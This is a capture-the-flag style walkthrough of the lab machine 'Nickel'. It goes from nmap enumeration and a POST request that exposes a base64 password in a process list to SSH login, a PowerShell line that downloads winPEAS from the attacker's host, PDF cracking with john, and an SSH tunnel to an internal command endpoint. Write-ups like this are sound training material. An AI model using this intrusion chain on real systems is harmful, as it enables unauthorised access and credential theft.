Nickel

Foothold

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Nmap scan report for 192.168.121.99
Host is up (0.019s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_  256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-06-18T20:30:07+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2022-06-17T20:16:10
|_Not valid after:  2022-12-17T20:16:10
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2022-06-18T20:29:03+00:00
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)

Nmap shows 8089 and 33333 are http page.

Looking through 8089 page, it seems to send request to 33333 page.

If we visit 33333 page directly, it’s Invalid Token

If we try to query the resource that we find in 8089,
for example, http://192.168.121.99:33333/list-current-deployments
then we get 

1
<p>Cannot "GET" /list-current-deployments</P>

emmm.. Cannot “GET”.

Therefore we send the payload to burpsuite and try to post it:

1
2
3
4
5
6
7
8
9
10
11
POST /list-current-deployments HTTP/1.1
Host: 192.168.121.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 5

test

We get not implemented.

I tried to wfuzz it and see if I can replace the data field of post so I can get more information.

1
wfuzz -z file,/usr/share/seclists/Discovery/Web-Content/api/objects.txt -d "FUZZ" --filter "chars!=22" http://192.168.121.99:33333/list-current-deployments

It didn’t work.

Break Through

But if we request another resource, /list-running-procs, it works.

We can see here we have a password passed through command line.

It seems to be base64 encoded. Decode it, and we get: NowiseSloopTheory139

We can login through ssh using the credential we found: ariah:NowiseSloopTheory139

Finally, we can find local.txt on the ariah’s Desktop.

Privilege Escalation

Upload winpeas using:

1
(New-Object Net.WebClient).DownloadFile("http://192.168.49.121/winPEASx64.exe","C:\Users\ariah\Downloads\w.exe")

We find a pdf file in the C:/ftp folder, but it needs a password.

We crack it with john. First use pdf2john to generate hash, then use john and rockyou to crack it.

the password is ariah4168.

A Temporary Command endpoint exists on the server.

We also find that the 80 port is actually open. I suspect it’s only accessable from internal network. That’s why we didn’t see it in the nmap scan.

Tunnel through using ssh:

1
ssh -N -L 0.0.0.0:80:192.168.121.99:80 ariah@192.168.121.99

We can easily grab the proof.txt file.

Time cost: 2 hours 30 minutes